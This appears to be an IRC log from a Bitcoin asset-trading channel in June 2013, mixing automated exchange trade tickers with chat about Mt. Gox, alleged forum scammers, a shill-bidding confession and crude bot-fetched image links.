[BTCTC] [COGNITIVE] 2 @ 0.241 = 0.482 BTC [-] Jun 21 18:31:14 [BTCTC] [BASIC-MINING] 1 @ 1.296001 BTC [-] Jun 21 18:31:20 [BTCTC] [BASIC-MINING] 1 @ 1.296 BTC [-] Jun 21 18:31:25 [BTCTC] [BASIC-MINING] 1 @ 1.295 BTC [-] Jun 21 18:31:27 [BTCTC] [BASIC-MINING] 1 @ 1.29 BTC [-] Jun 21 18:31:29 [BTCTC] [BASIC-MINING] 1 @ 1.285 BTC [-] Jun 21 18:31:31 [BTCTC] [BASIC-MINING] 1 @ 1.28 BTC [-] Jun 21 18:31:32 [BTCTC] [BASIC-MINING] 1 @ 1.275 BTC [-] Jun 21 18:31:34 [BTCTC] [BASIC-MINING] 1 @ 1.27 BTC [-] Jun 21 18:31:35 [BTCTC] [BASIC-MINING] 1 @ 1.265 BTC [-] Jun 21 18:31:36 [BTCTC] [BASIC-MINING] 1 @ 1.26 BTC [-] Jun 21 18:33:04 [BTCTC] [S.MPOE-PT] 198 @ 0.00077 = 0.1525 BTC [+] Jun 21 18:37:29 [BTCTC] [TAT.VIRTUALMINE] 17 @ 0.00595 = 0.1012 BTC [+] Jun 21 18:37:31 [BTCTC] [TAT.VIRTUALMINE] 83 @ 0.00595 = 0.4939 BTC [+] Jun 21 18:38:05 [MPEX] [S.MPOE] 5400 @ 0.00077521 = 4.1861 BTC [-] Jun 21 18:38:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.031799 = 0.0636 BTC [+] Jun 21 18:38:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.031798 BTC [-] Jun 21 18:40:42 [BTCTC] [ASICMINER-PT] 1 @ 3.075 BTC [+] Jun 21 18:40:45 [BTCTC] [ASICMINER-PT] 1 @ 3.077 BTC [+] Jun 21 18:43:26 [HAVELOCK] [ASICM] 1000 @ 0.03038999 = 30.39 BTC [+] Jun 21 18:45:40 [BTCTC] [ASICMINER-PT] 1 @ 3.0789 BTC [+] Jun 21 18:45:47 [BTCTC] [ASICMINER-PT] 1 @ 3.079 BTC [+] Jun 21 18:45:51 [BTCTC] [ASICMINER-PT] 2 @ 3.084 = 6.168 BTC [+] Jun 21 18:46:21 [BTCTC] [ASICMINER-PT] 1 @ 3.085 BTC [+] Jun 21 18:46:24 [BTCTC] [ASICMINER-PT] 2 @ 3.098 = 6.196 BTC [+] Jun 21 18:47:06 [HAVELOCK] [ASICM] 100 @ 0.031 = 3.1 BTC [+] Jun 21 18:47:34 [BTCTC] [S.DICE-PT] 2 @ 0.002702 = 0.0054 BTC [+] Jun 21 18:48:01 [BTCTC] [TAT.ASICMINER] 11 @ 0.030499 = 0.3355 BTC [-] Jun 21 18:48:23 [BTCTC] [BASIC-MINING] 1 @ 1.324999 BTC [+] Jun 21 18:48:32 [BTCTC] [BASIC-MINING] 1 @ 1.325 BTC [+] Jun 21 18:48:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.030042 BTC [-] Jun 21 18:48:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.03004 = 0.0601 BTC [-] Jun 21 18:49:01 [BTCTC] [TAT.ASICMINER] 37 @ 0.030497 = 1.1284 BTC [+] Jun 21 18:49:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.0305 BTC [+] Jun 21 18:49:06 [BTCTC] [TAT.ASICMINER] 12 @ 0.031698 = 0.3804 BTC [+] Jun 21 18:51:15 [BTCTC] [ASICMINER-PT] 3 @ 3.099 = 9.297 BTC [+] Jun 21 18:52:20 [BTCTC] [ASICMINER-PT] 4 @ 3.0999 = 12.3996 BTC [+] Jun 21 18:52:21 [BTCTC] [TAT.ASICMINER] 37 @ 0.031698 = 1.1728 BTC [+] Jun 21 18:53:12 [BTCTC] [ASICMINER-PT] 1 @ 3.09 BTC [-] Jun 21 18:55:21 [BTCTC] [TAT.ASICMINER] 60 @ 0.0317 = 1.902 BTC [+] Jun 21 18:56:20 [BTCTC] [TAT.ASICMINER] 4 @ 0.031698 = 0.1268 BTC [-] Jun 21 18:57:41 [BTCTC] [RSM] 1 @ 0.025998 BTC [+] Jun 21 18:58:21 [BTCTC] [RSM] 10 @ 0.025999 = 0.26 BTC [+] Jun 21 19:06:38 [BTCTC] [PAJKA.BOND] 3 @ 0.05 = 0.15 BTC [+] Jun 21 19:07:10 [BTCTC] [PAJKA.BOND] 1 @ 0.05 BTC [+] Jun 21 19:10:07 [BTCTC] [DMS.MINING] 2 @ 0.01838 = 0.0368 BTC [-] Jun 21 19:11:14 [BTCTC] [ASICMINER-PT] 1 @ 3.097 BTC [+] Jun 21 19:11:31 yes Jun 21 19:11:47 [BTCTC] [BASIC-MINING] 1 @ 1.338499 BTC [+] Jun 21 19:13:33 ) Mt. Gox is certainly not a martyr, but it would be hard to argue that we aren’t "taking one for the team" as far as Bitcoin is concerned. We are a big target, and are absorbing the frustrations of Bitcoiners, regulators, banks, and a media that still doesn't quite understand what Bitcoin is. This is a job we are happy to fill, and not just because we are compensated for it. Our hope is that, once Bitcoin finds its place, we will be able Jun 21 19:13:50 say that we made a difference in sorting it all out in the early days. New exchanges, business models, merchants, traders, and consumers are rising up to innovate and create a whole new way of doing business. A lot of lawyers are getting new cars in the meantime too. Jun 21 19:13:54 [BTCTC] [GSDPT] 62 @ 0.0025 = 0.155 BTC [-] Jun 21 19:14:09 [BTCTC] [ASICMINER-PT] 2 @ 3.08 = 6.16 BTC [-] Jun 21 19:14:15 [BTCTC] [GSDPT] 1 @ 0.0023 BTC [-] Jun 21 19:14:24 [BTCTC] [TAT.ASICMINER] 2 @ 0.0316 = 0.0632 BTC [-] Jun 21 19:14:25 [BTCTC] [ASICMINER-PT] 2 @ 3.097 = 6.194 BTC [+] Jun 21 19:14:27 [BTCTC] [GSDPT] 1 @ 0.0022 BTC [-] Jun 21 19:14:36 ok this one is rich too Jun 21 19:14:36 6) As risky as it is to invoke the name of Litecoin (LTC???), we must apologize for not keeping everyone up to date. The fact is that the current situation means a continued delay, but for good reasons. We’re looking at July right now, though that depends on a few things. Mainly, we want to do things correctly from the beginning. Jun 21 19:14:50 its too late from doing things correctly from the begining Jun 21 19:14:54 for Jun 21 19:14:57 not from Jun 21 19:15:40 [BTCTC] [ASICMINER-PT] 1 @ 3.098 BTC [+] Jun 21 19:15:43 [BTCTC] [ASICMINER-PT] 1 @ 3.0989 BTC [+] Jun 21 19:15:51 [BTCTC] [ASICMINER-PT] 2 @ 3.099 = 6.198 BTC [+] Jun 21 19:17:20 [BTCTC] [DMS.MINING] 2 @ 0.01838 = 0.0368 BTC [-] Jun 21 19:17:46 [BTCTC] [TAT.ASICMINER] 21 @ 0.031001 = 0.651 BTC [-] Jun 21 19:18:51 O_o Jun 21 19:19:31 more money is teh solution Jun 21 19:19:43 i dont hold any Jun 21 19:19:49 that whole thing is too much of a ghetto Jun 21 19:20:13 isnt it Jun 21 19:20:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.031599 BTC [+] Jun 21 19:21:04 im not arguing that Jun 21 19:21:56 well its a poor asset making lots of money Jun 21 19:22:04 how is this not followable Jun 21 19:22:43 by an unstrict definition of poor :) Jun 21 19:23:04 brb 3min Jun 21 19:25:47 well it makes ~.4% a month and some people argue that it does have a future, that they have a way out of the commodified market tarpit and other things. Jun 21 19:26:11 could be worse. Jun 21 19:26:29 [BTCTC] [ASICMINER-PT] 17 @ 3.1 = 52.7 BTC [+] Jun 21 19:26:33 [BTCTC] [ASICMINER-PT] 4 @ 3.1 = 12.4 BTC [+] Jun 21 19:28:30 [BTCTC] [ASICMINER-PT] 1 @ 3.19 BTC [+] Jun 21 19:31:07 [BTCTC] [ASICMINER-PT] 3 @ 3.189 = 9.567 BTC [-] Jun 21 19:32:45 [BTCTC] [ASICMINER-PT] 1 @ 3.1889 BTC [-] Jun 21 19:33:03 [BTCTC] [ASICMINER-PT] 1 @ 3.19 BTC [+] Jun 21 19:36:34 https://bitcointalk.org/index.php?topic=239819.0 Jun 21 19:36:38 seems there's a rash fo these Jun 21 19:36:40 Bitfunder account compromised Jun 21 19:37:19 [BTCTC] [TAT.ASICMINER] 10 @ 0.0312 = 0.312 BTC [-] Jun 21 19:38:49 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.00593 = 0.0297 BTC [-] Jun 21 19:39:06 it's scmmers Jun 21 19:39:10 claiming to be scammed Jun 21 19:39:19 [BTCTC] [TAT.ASICMINER] 20 @ 0.031199 = 0.624 BTC [-] Jun 21 19:39:26 i lookd into em Jun 21 19:39:29 as did others Jun 21 19:39:29 so i guess all of you guys have cock puppets accounts Jun 21 19:39:35 oops Jun 21 19:39:37 i dont Jun 21 19:39:37 *sock Jun 21 19:39:40 believe it or not Jun 21 19:39:46 i don't either Jun 21 19:39:50 i dont Jun 21 19:39:51 how do you know I put my cock in puppets? :( Jun 21 19:39:55 not sure i endorse or believe in it Jun 21 19:39:57 [BTCTC] [BASIC-MINING] 1 @ 1.338499 BTC [+] Jun 21 19:40:10 [HAVELOCK] [ASICM] 1 @ 0.031 BTC [+] Jun 21 19:40:10 [HAVELOCK] [ASICM] 7 @ 0.031 = 0.217 BTC [+] Jun 21 19:40:11 [HAVELOCK] [ASICM] 4 @ 0.0305 = 0.122 BTC [-] Jun 21 19:40:12 [HAVELOCK] [ASICM] 9 @ 0.0305 = 0.2745 BTC [-] Jun 21 19:40:13 [BTCTC] [BASIC-MINING] 1 @ 1.3385 BTC [+] Jun 21 19:40:23 catching someone with a sock account just seems icky to me Jun 21 19:40:46 kinda makes me think the person has a mental issue Jun 21 19:40:50 ThickAsThieves is it ? Jun 21 19:40:53 [BTCTC] [DMS.MINING] 40 @ 0.018388 = 0.7355 BTC [+] Jun 21 19:40:55 [BTCTC] [BASIC-MINING] 1 @ 1.348 BTC [+] Jun 21 19:40:57 [BTCTC] [BASIC-MINING] 5 @ 1.35 = 6.75 BTC [+] Jun 21 19:41:15 yes, the BF people claiming ti be scammed, Jun 21 19:41:20 have connected wallets Jun 21 19:41:25 [BTCTC] [S.MPOE-PT] 20 @ 0.00077 = 0.0154 BTC [+] Jun 21 19:41:26 jcpham well, i'm the only one that doesn't even have an account but still has a sock >D Jun 21 19:41:27 and sell spyware in old posts Jun 21 19:41:36 scammers Jun 21 19:41:36 ThickAsThieves ooo Jun 21 19:41:49 is this documented anywhere ? Jun 21 19:41:52 and CAPTCHA shenanigans Jun 21 19:41:53 i doubt they lost anything Jun 21 19:42:18 i didnt bother quoting the posts Jun 21 19:42:25 i'm not a moderator n shit Jun 21 19:42:33 [BTCTC] [DMS.MINING] 2 @ 0.018389 = 0.0368 BTC [+] Jun 21 19:42:35 [BTCTC] [DMS.MINING] 16 @ 0.01839 = 0.2942 BTC [+] Jun 21 19:42:36 i just thought it smelled fishy Jun 21 19:42:40 ic Jun 21 19:42:41 and i was right Jun 21 19:42:43 [BTCTC] [DMS.MINING] 49 @ 0.018398 = 0.9015 BTC [+] Jun 21 19:43:01 a;ways best to make a little opastebin Jun 21 19:43:05 since you're there anyway Jun 21 19:43:05 [HAVELOCK] [ASICM] 5 @ 0.0315 = 0.1575 BTC [+] Jun 21 19:43:06 [HAVELOCK] [ASICM] 145 @ 0.0315 = 4.5675 BTC [+] Jun 21 19:44:22 i'll be a more responsible slueth in the future Jun 21 19:44:29 sleuth? Jun 21 19:44:34 private dick Jun 21 19:44:39 gumshoe Jun 21 19:44:42 etc Jun 21 19:44:51 hehe Jun 21 19:46:05 [BTCTC] [TAT.ASICMINER] 10 @ 0.03169 = 0.3169 BTC [+] Jun 21 19:46:31 [BTCTC] [DMS.MINING] 1 @ 0.018388 BTC [-] Jun 21 19:48:21 [BTCTC] [S.MPOE-PT] 45 @ 0.00077 = 0.0347 BTC [+] Jun 21 19:48:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.03169 = 0.0634 BTC [+] Jun 21 19:49:09 [BTCTC] [BASIC-MINING] 1 @ 1.357899 BTC [+] Jun 21 19:49:27 [BTCTC] [BASIC-MINING] 2 @ 1.3579 = 2.7158 BTC [+] Jun 21 19:49:29 [BTCTC] [BITVPS] 15 @ 0.0016 = 0.024 BTC [+] Jun 21 19:49:30 [BTCTC] [BASIC-MINING] 1 @ 1.358 BTC [+] Jun 21 19:50:30 [BTCTC] [DMS.PURCHASE] 5 @ 0.054282 = 0.2714 BTC [-] Jun 21 19:50:42 [BTCTC] [DMS.MINING] 9 @ 0.018388 = 0.1655 BTC [-] Jun 21 19:51:25 [BTCTC] [GSDPT] 1 @ 0.002587 BTC [+] Jun 21 19:51:38 [BTCTC] [TAT.ASICMINER] 50 @ 0.0316 = 1.58 BTC [-] Jun 21 19:51:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.0313 BTC [-] Jun 21 19:52:39 [BTCTC] [TAT.ASICMINER] 48 @ 0.031202 = 1.4977 BTC [-] Jun 21 19:53:15 [BTCTC] [ASICMINER-PT] 1 @ 3.189 BTC [-] Jun 21 19:53:28 [HAVELOCK] [ASICM] 7 @ 0.031485 = 0.2204 BTC [-] Jun 21 19:53:52 [BTCTC] [BITVPS] 70 @ 0.0016 = 0.112 BTC [+] Jun 21 19:54:12 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00593 = 0.0593 BTC [-] Jun 21 19:54:48 [BTCTC] [BITVPS] 11 @ 0.0016 = 0.0176 BTC [+] Jun 21 19:55:34 [BTCTC] [B.YABMC] 5 @ 0.009 = 0.045 BTC [+] Jun 21 19:56:18 [BTCTC] [TAT.ASICMINER] 6 @ 0.031599 = 0.1896 BTC [+] Jun 21 19:58:45 [HAVELOCK] [ASICM] 71 @ 0.03149 = 2.2358 BTC [+] Jun 21 19:59:43 get your popcorn out https://bitcointalk.org/index.php?topic=238474.msg2542461#msg2542461 Jun 21 19:59:57 the last quote is kinda new Jun 21 20:00:27 [BTCTC] [TAT.ASICMINER] 42 @ 0.031499 = 1.323 BTC [-] Jun 21 20:00:37 [BTCTC] [TAT.ASICMINER] 4 @ 0.031499 = 0.126 BTC [-] Jun 21 20:00:48 [BTCTC] [TAT.ASICMINER] 53 @ 0.0313 = 1.6589 BTC [-] Jun 21 20:01:04 [BTCTC] [S.MPOE-PT] 3 @ 0.00077 = 0.0023 BTC [+] Jun 21 20:01:32 oh geez Jun 21 20:01:35 I hereby confess to bidding up my own auctions using the "Werner" forum handle. This is despicable, I know. I did this out of pure greed. Scamming anyone was not the priority, getting a few extra measly bitcoins for Cognitive's auction was my goal Jun 21 20:01:36 fkn idiot Jun 21 20:01:51 lol we don't even have bitcoin banks yet, Jun 21 20:01:56 we already have bitcoin bankers Jun 21 20:01:57 [BTCTC] [ASICMINER-PT] 2 @ 3.189 = 6.378 BTC [-] Jun 21 20:01:59 [BTCTC] [ASICMINER-PT] 1 @ 3.19 BTC [+] Jun 21 20:02:03 [BTCTC] [ASICMINER-PT] 1 @ 3.199 BTC [+] Jun 21 20:02:11 [BTCTC] [ASICMINER-PT] 1 @ 3.2 BTC [+] Jun 21 20:02:17 [BTCTC] [DMS.MINING] 1 @ 0.01838 BTC [-] Jun 21 20:02:21 [BTCTC] [ASICMINER-PT] 5 @ 3.2 = 16 BTC [+] Jun 21 20:02:33 because he got caught, he will be a good person now Jun 21 20:02:35 heh Jun 21 20:02:56 nice fancy font for his signature Jun 21 20:03:01 can't blame him. ambition and the atmosphere of "o look, Y asset made .5% more than you, you suck!" Jun 21 20:03:09 ie, exactly what caused the banking crysis Jun 21 20:03:13 teh problem is being american really. Jun 21 20:03:32 personally, i find it so much easier to be honest Jun 21 20:03:40 no bullshit to keep track of Jun 21 20:03:57 yes but then how are you to compete!!!1 Jun 21 20:03:58 [BTCTC] [BITVPS] 54 @ 0.0016 = 0.0864 BTC [+] Jun 21 20:04:15 i'm doing okay so far Jun 21 20:04:31 i guess i could be doing WAY better if i cheated Jun 21 20:04:39 [BTCTC] [BITVPS] 1 @ 0.00129 BTC [-] Jun 21 20:04:48 short term investors. this is one of the many reasons they're not to be encouraged Jun 21 20:04:54 they induce misbehaviour in management. Jun 21 20:06:00 [BTCTC] [ASICMINER-PT] 3 @ 3.199 = 9.597 BTC [-] Jun 21 20:06:08 [BTCTC] [ASICMINER-PT] 1 @ 3.2 BTC [+] Jun 21 20:06:12 [BTCTC] [ASICMINER-PT] 1 @ 3.21 BTC [+] Jun 21 20:06:18 [BTCTC] [ASICMINER-PT] 2 @ 3.22 = 6.44 BTC [+] Jun 21 20:06:21 [BTCTC] [ASICMINER-PT] 1 @ 3.2339 BTC [+] Jun 21 20:06:22 [BTCTC] [ASICMINER-PT] 17 @ 3.234 = 54.978 BTC [+] Jun 21 20:07:19 yeesh Jun 21 20:09:14 [HAVELOCK] [ASICM] 7 @ 0.031 = 0.217 BTC [-] Jun 21 20:09:42 [BTCTC] [ASICMINER-PT] 1 @ 3.234 BTC [+] Jun 21 20:10:56 [BTCTC] [TAT.ASICMINER] 7 @ 0.0316 = 0.2212 BTC [+] Jun 21 20:10:59 [MPEX] [S.MPOE] 6827 @ 0.00077637 = 5.3003 BTC [+] Jun 21 20:11:10 [BTCTC] [TAT.ASICMINER] 9 @ 0.0316 = 0.2844 BTC [+] Jun 21 20:12:20 [BTCTC] [ASICMINER-PT] 13 @ 3.235 = 42.055 BTC [+] Jun 21 20:13:12 [BTCTC] [BASIC-MINING] 5 @ 1.42 = 7.1 BTC [+] Jun 21 20:13:19 it's easy to cheat on exams. i think perhaps it's literally impossible to cheat on building real things. one can cheat idiots out of their gold, but then one isn't really building things, amirite? Jun 21 20:15:14 [BTCTC] [TAT.ASICMINER] 25 @ 0.0317 = 0.7925 BTC [+] Jun 21 20:15:41 [BTCTC] [ASICMINER-PT] 2 @ 3.234 = 6.468 BTC [-] Jun 21 20:16:30 [BTCTC] [ASICMINER-PT] 1 @ 3.234 BTC [-] Jun 21 20:16:46 building a cheatery Jun 21 20:16:54 [BTCTC] [ASICMINER-PT] 1 @ 3.150001 BTC [-] Jun 21 20:16:58 [BTCTC] [ASICMINER-PT] 3 @ 3.15 = 9.45 BTC [-] Jun 21 20:17:04 i guess you're rite. Jun 21 20:17:12 [BTCTC] [ASICMINER-PT] 1 @ 3.23 BTC [+] Jun 21 20:17:17 problem is politics isn't about building anything, it's about making people shut the fuck up Jun 21 20:17:17 [BTCTC] [TAT.ASICMINER] 15 @ 0.0317 = 0.4755 BTC [+] Jun 21 20:17:18 [BTCTC] [ASICMINER-PT] 1 @ 3.23 BTC [+] Jun 21 20:17:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.0317 BTC [+] Jun 21 20:17:36 [BTCTC] [TAT.ASICMINER] 7 @ 0.0316 = 0.2212 BTC [-] Jun 21 20:17:40 the cheatery: http://goo.gl/FlfvL Jun 21 20:18:43 [BTCTC] [S.MPOE-PT] 45 @ 0.000711 = 0.032 BTC [-] Jun 21 20:19:11 [BTCTC] [ASICMINER-PT] 1 @ 3.234 BTC [+] Jun 21 20:19:33 [HAVELOCK] [ASICM] 16 @ 0.0301 = 0.4816 BTC [-] Jun 21 20:19:46 [BTCTC] [TAT.ASICMINER] 80 @ 0.0316 = 2.528 BTC [-] Jun 21 20:22:13 [HAVELOCK] [VTX] 1 @ 0.449999 BTC [+] Jun 21 20:22:18 [HAVELOCK] [HIM] 2 @ 0.28001 = 0.56 BTC [-] Jun 21 20:22:46 [HAVELOCK] [ASICM] 7 @ 0.031 = 0.217 BTC [+] Jun 21 20:23:03 [BTCTC] [ASICMINER-PT] 5 @ 3.15 = 15.75 BTC [-] Jun 21 20:23:35 [HAVELOCK] [ASICM] 14 @ 0.031 = 0.434 BTC [+] Jun 21 20:23:49 [BTCTC] [ASICMINER-PT] 16 @ 3.14159 = 50.2654 BTC [-] Jun 21 20:24:26 [BTCTC] [ASICMINER-PT] 5 @ 2.89 = 14.45 BTC [-] Jun 21 20:24:47 [BTCTC] [ASICMINER-PT] 1 @ 3.101002 BTC [+] Jun 21 20:25:01 [BTCTC] [ASICMINER-PT] 2 @ 3.101002 = 6.202 BTC [+] Jun 21 20:25:10 [BTCTC] [ASICMINER-PT] 3 @ 3.1011 = 9.3033 BTC [+] Jun 21 20:25:20 [BTCTC] [ASICMINER-PT] 3 @ 2.89 = 8.67 BTC [-] Jun 21 20:33:47 [BTCTC] [BASIC-MINING] 2 @ 1.49 = 2.98 BTC [+] Jun 21 20:34:28 .d Jun 21 20:34:29 19339258.27239 | Next Diff in 1301 blocks | Estimated Change: 3.2397% in 8d 17h 13m 20s Jun 21 20:34:46 .nethash Jun 21 20:34:47 143509.241011 Jun 21 20:35:14 [BTCTC] [BITVPS] 1 @ 0.001281 BTC [-] Jun 21 20:38:04 [BTCTC] [ASICMINER-PT] 1 @ 3.179 BTC [+] Jun 21 20:38:18 mircea_popescu: I SUMMON THEE Jun 21 20:38:25 APPEAR OH FEARLESS LEADER Jun 21 20:38:41 A trilemma is a difficult choice from three options, each of which is (or appears) unacceptable or unfavourable. Jun 21 20:38:52 writing bbl. Jun 21 20:39:03 i want t credits Jun 21 20:39:06 gimme credits yo Jun 21 20:39:10 is that address still good? Jun 21 20:39:16 how much I owe you Jun 21 20:43:16 [HAVELOCK] [ASICM] 5 @ 0.03164 = 0.1582 BTC [+] Jun 21 20:43:34 [HAVELOCK] [ASICM] 5 @ 0.03188 = 0.1594 BTC [+] Jun 21 20:44:20 [BTCTC] [DMS.SELLING] 33 @ 0.036211 = 1.195 BTC [+] Jun 21 20:44:22 [HAVELOCK] [ASICM] 1 @ 0.03189 BTC [+] Jun 21 20:45:03 .bait Jun 21 20:45:07 http://25.media.tumblr.com/d8fcc114ae5223f52c95d69a523583bc/tumblr_mis9kovznV1rbbu6ho1_500.jpg Jun 21 20:45:17 [HAVELOCK] [SDICE] 1 @ 0.208 BTC [-] Jun 21 20:45:19 [HAVELOCK] [SDICE] 1 @ 0.207 BTC [-] Jun 21 20:45:19 [HAVELOCK] [SDICE] 2 @ 0.206 = 0.412 BTC [-] Jun 21 20:45:20 [HAVELOCK] [SDICE] 1 @ 0.2001 BTC [-] Jun 21 20:45:21 [HAVELOCK] [SDICE] 10 @ 0.200001 = 2 BTC [-] Jun 21 20:45:22 [HAVELOCK] [SDICE] 20 @ 0.2000001 = 4 BTC [-] Jun 21 20:46:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.0316 BTC [-] Jun 21 20:46:48 [MPEX] [S.MPOE] 950 @ 0.00077521 = 0.7364 BTC [-] Jun 21 20:46:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.0317 BTC [+] Jun 21 20:46:55 [MPEX] [S.MPOE] 4150 @ 0.00077435 = 3.2136 BTC [-] Jun 21 20:47:11 .bait Jun 21 20:47:15 http://24.media.tumblr.com/c6031119ff44035213da603da9b8fc50/tumblr_mhjjmvixWR1qd65u0o1_1280.jpg Jun 21 20:47:35 [HAVELOCK] [ASICM] 5 @ 0.03185 = 0.1593 BTC [-] Jun 21 20:47:55 [HAVELOCK] [HIM] 3 @ 0.28001 = 0.84 BTC [-] Jun 21 20:48:17 [HAVELOCK] [ASICM] 5 @ 0.03185 = 0.1593 BTC [-] Jun 21 20:48:20 too old Jun 21 20:48:28 [HAVELOCK] [ASICM] 15 @ 0.03189 = 0.4784 BTC [+] Jun 21 20:48:30 exactly Jun 21 20:48:33 .bait Jun 21 20:48:38 http://24.media.tumblr.com/tumblr_m157x4cT471r0mqlno1_1280.jpg Jun 21 20:48:46 boring Jun 21 20:49:00 [HAVELOCK] [ASICM] 6 @ 0.03189 = 0.1913 BTC [+] Jun 21 20:49:14 [BTCTC] [TAT.ASICMINER] 96 @ 0.0317 = 3.0432 BTC [+] Jun 21 20:49:17 listen ozbot, you better come up with some real material. Jun 21 20:49:45 [HAVELOCK] [HIM] 3 @ 0.28001 = 0.84 BTC [-] Jun 21 20:50:07 [HAVELOCK] [ASICM] 7 @ 0.031885 = 0.2232 BTC [-] Jun 21 20:50:13 [BTCTC] [BASIC-MINING] 1 @ 1.49 BTC [+] Jun 21 20:50:22 [HAVELOCK] [ASICM] 15 @ 0.03189 = 0.4784 BTC [+] Jun 21 20:50:34 [HAVELOCK] [ASICM] 3 @ 0.03189 = 0.0957 BTC [+] Jun 21 20:50:40 [HAVELOCK] [ASICM] 1 @ 0.03189 BTC [+] Jun 21 20:51:24 :) Jun 21 20:51:28 [BTCTC] [DMS.MINING] 1 @ 0.0179 BTC [-] Jun 21 20:51:29 [BTCTC] [DMS.MINING] 6 @ 0.0179 = 0.1074 BTC [-] Jun 21 20:51:31 .boobies Jun 21 20:51:35 http://25.media.tumblr.com/53cb5b79ba4f0cce81741333d3d1ffc3/tumblr_mfzhx3NxZP1s04ckeo1_500.jpg Jun 21 20:51:44 .ass Jun 21 20:51:48 meh Jun 21 20:51:51 no boobies in that Jun 21 20:52:01 scam Jun 21 20:52:06 .boobies Jun 21 20:52:10 http://25.media.tumblr.com/866d23b9da0563f571171e6e90f310bc/tumblr_mh098qXUXq1rnwj4ko1_500.png Jun 21 20:52:13 [BTCTC] [BTC-TRADING-PT] 2 @ 0.5867 = 1.1734 BTC [+] Jun 21 20:52:20 better Jun 21 20:52:22 thats harly bobbies Jun 21 20:52:24 hardly Jun 21 20:52:27 [BTCTC] [DMS.MINING] 1 @ 0.0178 BTC [-] Jun 21 20:52:34 .boobies Jun 21 20:52:35 like half of one. Jun 21 20:52:37 http://25.media.tumblr.com/tumblr_me0x4rf5ZI1r6bw5mo1_500.jpg Jun 21 20:52:47 win Jun 21 20:52:56 [BTCTC] [DMS.MINING] 3 @ 0.0177 = 0.0531 BTC [-] Jun 21 20:52:57 hey guys do I have to have an MPEX account to trade on here or this any sort of broker service? Jun 21 20:53:09 just like bitcointalk, 2 out of 3 are scam Jun 21 20:53:11 [BTCTC] [DMS.MINING] 2 @ 0.0176 = 0.0352 BTC [-] Jun 21 20:53:13 [BTCTC] [DMS.MINING] 1 @ 0.0176 BTC [-] Jun 21 20:53:13 where is jurov when you need him Jun 21 20:53:14 [BTCTC] [DMS.MINING] 5 @ 0.0176 = 0.088 BTC [-] Jun 21 20:53:20 [BTCTC] [S.MPOE-PT] 3 @ 0.00077 = 0.0023 BTC [+] Jun 21 20:53:23 jordandotdev follow the link in the topic Jun 21 20:53:39 karobrekla I did ... wasn't a ton of info Jun 21 20:53:50 did not? Jun 21 20:53:54 [BTCTC] [DMS.MINING] 18 @ 0.0175 = 0.315 BTC [-] Jun 21 20:53:55 [BTCTC] [DMS.MINING] 1 @ 0.0175 BTC [-] Jun 21 20:54:00 the shit is listed on the right side of the page Jun 21 20:54:16 [BTCTC] [DMS.MINING] 6 @ 0.01701 = 0.1021 BTC [-] Jun 21 20:54:43 [BTCTC] [DMS.MINING] 1 @ 0.017 BTC [-] Jun 21 20:54:46 anyway, coinbr is mpex broker Jun 21 20:54:48 [BTCTC] [DMS.MINING] 1 @ 0.017 BTC [-] Jun 21 20:54:54 thats is what you are looking for i guess Jun 21 20:55:08 well yes, I don't necessarily want to spend 30BTC for a seat on MPEX Jun 21 20:55:13 or whatever the fee is Jun 21 20:55:23 [BTCTC] [DMS.MINING] 20 @ 0.01613 = 0.3226 BTC [-] Jun 21 20:55:29 I believe that's it so I was looking for an explanation, how shares are assigned if you deal through a broker etc. Jun 21 20:55:43 ;;seen jurov Jun 21 20:55:43 jurov was last seen in #bitcoin-assets 1 day, 17 hours, 53 minutes, and 15 seconds ago: thestringpuller: how elaborate? Jun 21 20:56:14 [BTCTC] [DMS.MINING] 10 @ 0.01611 = 0.1611 BTC [-] Jun 21 20:56:20 [BTCTC] [DMS.MINING] 2 @ 0.01613 = 0.0323 BTC [+] Jun 21 20:56:26 [BTCTC] [DMS.MINING] 2 @ 0.0161 = 0.0322 BTC [-] Jun 21 20:56:28 [BTCTC] [DMS.SELLING] 50 @ 0.03709 = 1.8545 BTC [+] Jun 21 20:56:32 [BTCTC] [DMS.MINING] 5 @ 0.0161 = 0.0805 BTC [-] Jun 21 20:56:37 [BTCTC] [DMS.MINING] 100 @ 0.01602 = 1.602 BTC [-] Jun 21 20:56:39 [BTCTC] [DMS.MINING] 10 @ 0.01601 = 0.1601 BTC [-] Jun 21 20:56:41 [BTCTC] [DMS.MINING] 500 @ 0.015001 = 7.5005 BTC [-] Jun 21 20:56:50 [BTCTC] [GSDPT] 1 @ 0.002587 BTC [+] Jun 21 20:57:03 [BTCTC] [ASICMINER-PT] 2 @ 3.174 = 6.348 BTC [-] Jun 21 20:57:20 [BTCTC] [ASICMINER-PT] 1 @ 3.179 BTC [+] Jun 21 20:57:46 [BTCTC] [ASICMINER-PT] 1 @ 3.179 BTC [+] Jun 21 20:58:09 [BTCTC] [DMS.MINING] 1 @ 0.01601 BTC [+] Jun 21 20:58:16 [HAVELOCK] [ASICM] 1 @ 0.03189 BTC [+] Jun 21 20:58:20 [BTCTC] [ASICMINER-PT] 2 @ 2.89 = 5.78 BTC [-] Jun 21 20:58:23 [BTCTC] [ASICMINER-PT] 1 @ 3.194 BTC [+] Jun 21 20:58:52 [BTCTC] [TAT.ASICMINER] 2 @ 0.0317 = 0.0634 BTC [+] Jun 21 20:58:58 [BTCTC] [TAT.ASICMINER] 26 @ 0.0318 = 0.8268 BTC [+] Jun 21 20:59:25 [BTCTC] [DMS.SELLING] 8 @ 0.03709 = 0.2967 BTC [+] Jun 21 20:59:28 [BTCTC] [DMS.SELLING] 77 @ 0.03709 = 2.8559 BTC [+] Jun 21 20:59:30 [BTCTC] [DMS.SELLING] 76 @ 0.0371 = 2.8196 BTC [+] Jun 21 20:59:35 [BTCTC] [DMS.SELLING] 104 @ 0.037999 = 3.9519 BTC [+] Jun 21 20:59:38 [BTCTC] [DMS.SELLING] 100 @ 0.038 = 3.8 BTC [+] Jun 21 20:59:52 [BTCTC] [ASICMINER-PT] 1 @ 3.19899 